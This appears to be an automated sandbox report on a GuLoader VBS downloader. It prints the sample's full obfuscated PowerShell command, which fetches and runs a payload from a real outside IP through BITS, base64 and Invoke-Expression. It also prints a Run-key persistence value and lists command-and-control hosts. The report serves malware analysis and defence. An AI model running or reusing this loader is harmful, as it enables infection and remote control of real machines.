Malware Analysis Report

2025-08-10 19:27

Sample ID 230712-lcpnjacf57
Target Reylon.vbs
SHA256 82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56
Tags
guloader downloader persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

82b08d87211f44c871d681e216fcd8ae33f485af2f6737011f187c5a56ac8c56

Threat Level: Known bad

The file Reylon.vbs was found to be: Known bad.

Malicious Activity Summary

guloader downloader persistence

Guloader,Cloudeye

Blocklisted process makes network request

Checks computer location settings

Checks QEMU agent file

Adds Run key to start application

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-12 09:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-12 09:23

Reported

2023-07-12 09:26

Platform

win7-20230705-en

Max time kernel

148s

Max time network

136s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\internet explorer\ieinstal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-511725148-388773979-2853099937-1000\Software\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2348 set thread context of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3052 wrote to memory of 564 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 564 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3052 wrote to memory of 564 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 564 wrote to memory of 2348 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
PID 2348 wrote to memory of 2668 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

Network

Country Destination Domain Proto
TR 194.55.224.183:80 194.55.224.183 tcp
TR 194.55.224.183:80 194.55.224.183 tcp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 top.abuse1disabled.xyz udp
NL 134.19.179.139:5631 top.abuse1disabled.xyz tcp
US 8.8.8.8:53 sub.abuse2disabled.xyz udp
US 199.249.230.37:5631 sub.abuse2disabled.xyz tcp
DE 38.242.234.206:5631 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab765B.tmp

MD5 3ac860860707baaf32469fa7cc7c0192
SHA1 c33c2acdaba0e6fa41fd2f00f186804722477639
SHA256 d015145d551ecd14916270efad773bbc9fd57fad2228d2c24559f696c961d904
SHA512 d62ad2408c969a95550fb87efda50f988770ba5e39972041bf85924275baf156b8bec309ecc6409e5acdd37ec175dea40eff921ab58933b5b5b5d35a6147567c

memory/564-74-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-75-0x000000001B420000-0x000000001B702000-memory.dmp

memory/564-76-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/564-77-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-78-0x00000000026E0000-0x0000000002760000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0S6AHN3HR5DX9LVALPHG.temp

MD5 271ae57e5fe7ec7130268737b82214b5
SHA1 be8854b23b036dc02c441b7975f0d3c5291f1213
SHA256 fd950c53f966e28f87c20d132f718a54534709640e4e6a5c79fb5a8ca42a83ac
SHA512 a3f9777fa851e5248cba54dd54ee5456d58abe07cc644ae6df6f7d5fd1a8df150b5eaeda76d128a7b0a9f0801156ac203bfe2808b3aa2d99f0128abea2a7a699

memory/2348-82-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-81-0x00000000026B0000-0x00000000026F0000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 770d8350daae6c7f2b5b25ca43f3522a
SHA1 c96b106e2d7bba04ba7c36458739a8825d42a189
SHA256 a771ab56702938dc05d65cebb57c6697b5ce152330222abc36775107e131d0ab
SHA512 421a70e8b4c4ef6182d542c622a5139c820d1bfe58ab8bcc3240f62263cc5c6df16a68319e144930f5320f9cb2e9242d9c60e6ba7b71f4f9ee7f84486c2db084

C:\Users\Admin\AppData\Local\Temp\TarBC6E.tmp

MD5 4ff65ad929cd9a367680e0e5b1c08166
SHA1 c0af0d4396bd1f15c45f39d3b849ba444233b3a2
SHA256 c8733c93cc5aaf5ca206d06af22ee8dbdec764fb5085019a6a9181feb9dfdee6
SHA512 f530dc0d024a5a3b8903ffaaa41b608a5ccdd6da4ba1949f2c2e55a9fca475fec5c8d2119b5763cabe7ef1c3788fb9dcac621869db51d65b1d83cfe404fb4c27

memory/564-93-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-94-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/564-95-0x00000000026E0000-0x0000000002760000-memory.dmp

memory/2348-97-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-98-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-96-0x00000000026B0000-0x00000000026F0000-memory.dmp

memory/2348-99-0x0000000005F60000-0x0000000009927000-memory.dmp

memory/2348-100-0x0000000005010000-0x0000000005011000-memory.dmp

memory/2668-103-0x0000000000C20000-0x00000000045E7000-memory.dmp

memory/2668-104-0x0000000000C20000-0x00000000045E7000-memory.dmp

memory/2668-106-0x0000000000C20000-0x00000000045E7000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-12 09:23

Reported

2023-07-12 09:26

Platform

win10v2004-20230703-en

Max time kernel

150s

Max time network

152s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

Signatures

Guloader,Cloudeye

downloader guloader

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Checks QEMU agent file

Description Indicator Process Target
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened (read-only) C:\Program Files\Qemu-ga\qemu-ga.exe C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Program Files (x86)\internet explorer\ieinstal.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kalibr = "%Della% -w 1 $Exostrad=(Get-ItemProperty -Path 'HKCU:\\Outglari\\').Part;%Della% ($Exostrad)" C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1580 set thread context of 3368 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\internet explorer\ieinstal.exe

Enumerates physical storage devices

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\internet explorer\ieinstal.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reylon.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "Function Diskussi9 ([String]$Fibrocysto){For($Apha=1; $Apha -lt $Fibrocysto.Length-1; $Apha+=(1+1)){$Laeserfo=$Laeserfo+$Fibrocysto.Substring($Apha, 1)};$Laeserfo;}$Unconfe=Diskussi9 'Wh t t pB: /V/D1 9 4 . 5L5 .W2 2T4D.M1B8B3D/TmMrKk / SBtoySr t h jteM2 0S. p f m ';$Laeserfo01=Diskussi9 'SiLe xK ';$Egenfinan = Diskussi9 'H\Bs y s waorw 6M4A\KWLi nBd oMwUsUPPoAwAe rSSEhGeFl l \vv 1R. 0 \UpHoewSe rMsBhFeBl lK.IeSx eD ';.($Laeserfo01) (Diskussi9 'G$ OGvIe rR2 =S$ e nMv : wRiDnsd i rA ') ;.($Laeserfo01) (Diskussi9 ' $SE gSe nFfBiFn aDn = $SOSv eIrF2N+I$ E gFe nOf i nja n ') ;.($Laeserfo01) (Diskussi9 'H$FTboLn iae rNgDaPt eu M= (f( gGwEmBiU w iRnR3E2G_SpArBoRcUe sAsu -KFE MP rDo cGe s sDI dc=A$U{VP IHDB}P)U. C oDmPm aPnPdULUiVn eC) -As pFlSi tG V[Dc h aArU]U3R4T ');.($Laeserfo01) (Diskussi9 'V$ F o cvaIlHoA U=K $ETSoKn iSefrEgRaKtMe [M$ATIo n iReQrCgIaGt e .BcSoSu nUtC-M2L] ');.($Laeserfo01) (Diskussi9 'I$CKPa mBm e rHtA=B( THeFsVt -KPIaSt h S$BE gKe n fSiCn aSnC)B - AUn dL A(T[QIPn tAPItCrD]H:R:Rs iUz eE - e qF L8 )B ') ;if ($Kammert) {.$Egenfinan $Focalo;} else {;$Laeserfo00=Diskussi9 'BSRt aGr tC-IBKi tKsET r aBnSsSf eCr -RS o uFr cBe r$cU n c o nRf e -SD e sStMi n aFtSi o nC P$ OSvpeKrs2C ';.($Laeserfo01) (Diskussi9 ' $UORv eRrM2E= $Me nFvP: a pHpIdCaLt aM ') ;.($Laeserfo01) (Diskussi9 'IITm pDoAr tC- Meo dOudlSe RB iStksBT rDaBn s f eFrG ') ;$Over2=$Over2+'\Fattenl.Stu';while (-not $Webs) {.($Laeserfo01) (Diskussi9 'L$BW e bBs =F( TSe s t - PEaHtTh L$GODvOe rK2H)S ') ;.($Laeserfo01) $Laeserfo00;.($Laeserfo01) (Diskussi9 'dSBt a rut - SEl efeEpU 5R ');}.($Laeserfo01) (Diskussi9 ' $ID iTsSk uRs s i S=S MGPeStA- CFoSnSt eHn tB $BORv eLrR2R ');.($Laeserfo01) (Diskussi9 'U$DAFbWiSlTl apgTe b r = P[sS ytsStPePmF.TCPobnBvDe rDt ] :O: F r oCm BRaKsAeS6 4PS tHr i nBgS( $nD iNsEk uOsUsTiP)a ');.($Laeserfo01) (Diskussi9 ' $ L aCe s eBr f oL2 =P [SS yOsAtneLm .STke xRtP.ME njc oBdMiBnSgS] :T: AFSFCFISI .RGCe t S tCr i n g ( $PAFbEi lKl aEg e b rT) ');.($Laeserfo01) (Diskussi9 ' $VNPa t ulrWgK= $kLXaAeUs eCrCfeo 2I. sEu b s tGrWi nEgA( 2Z1 0T8B3D1F,L1L9S0 6T2 ) ');.($Laeserfo01) $Naturg;}"

C:\Program Files (x86)\internet explorer\ieinstal.exe

"C:\Program Files (x86)\internet explorer\ieinstal.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 69.121.18.2.in-addr.arpa udp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 183.224.55.194.in-addr.arpa udp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 254.131.241.8.in-addr.arpa udp
TR 194.55.224.183:80 194.55.224.183 tcp
US 8.8.8.8:53 top.abuse1disabled.xyz udp
NL 134.19.179.139:5631 top.abuse1disabled.xyz tcp
US 8.8.8.8:53 sub.abuse2disabled.xyz udp
US 199.249.230.37:5631 sub.abuse2disabled.xyz tcp
DE 38.242.234.206:5631 tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 206.234.242.38.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 9.173.189.20.in-addr.arpa udp

Files

memory/3396-142-0x000001F1C1E80000-0x000001F1C1EA2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_byf0oizh.rtb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3396-147-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-148-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/3396-149-0x000001F1A99F0000-0x000001F1A9A00000-memory.dmp

memory/1580-150-0x0000000002D00000-0x0000000002D36000-memory.dmp

memory/1580-151-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-152-0x00000000056F0000-0x0000000005D18000-memory.dmp

memory/1580-153-0x0000000005D70000-0x0000000005D92000-memory.dmp

memory/1580-154-0x0000000005E20000-0x0000000005E86000-memory.dmp

memory/1580-155-0x0000000005E90000-0x0000000005EF6000-memory.dmp

memory/1580-165-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-166-0x0000000006600000-0x000000000661E000-memory.dmp

memory/1580-167-0x0000000002D40000-0x0000000002D50000-memory.dmp

memory/1580-168-0x0000000007E50000-0x00000000084CA000-memory.dmp

memory/1580-169-0x0000000006BB0000-0x0000000006BCA000-memory.dmp

